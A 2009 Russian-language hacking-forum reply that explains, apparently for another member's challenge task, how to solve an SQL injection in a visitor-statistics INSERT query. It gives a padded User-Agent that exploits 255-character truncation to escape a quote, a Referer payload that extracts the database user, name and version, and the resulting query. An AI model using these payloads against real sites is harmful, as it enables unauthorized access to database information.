11.11.2009, 15:25
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от (Dm)
если ты эт про мое задание, напиши как выполнить sql инъекцию.
Да очень просто... Я уже один раз встречался с подобным 
Юзер-агент ставим:
Код:
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\
Реферер:
Код:
, concat_ws(0x3a,user(),database(),version())) --
И таким образом в поле "Реферер" запишется юзер, бд, версия. Почему? Да потому что substr() обрезает строку до 255 символов, а у нас она 256 символов - 254 нуля и слешированый слеш, тоесть \\. Ну а дальше по логике запроса идет:
Код:
INSERT INTO stats (ip, useragent, referer)
VALUES
(
'127.0.0.1',
'000...много нулей...00\',',
concat_ws(0x3a,user(),database(),version())
)
--')
ЗЫ: Вот тут была похожая ситуация:
http://forum.antichat.ru/threadnav134652-1-10.html
|
|
|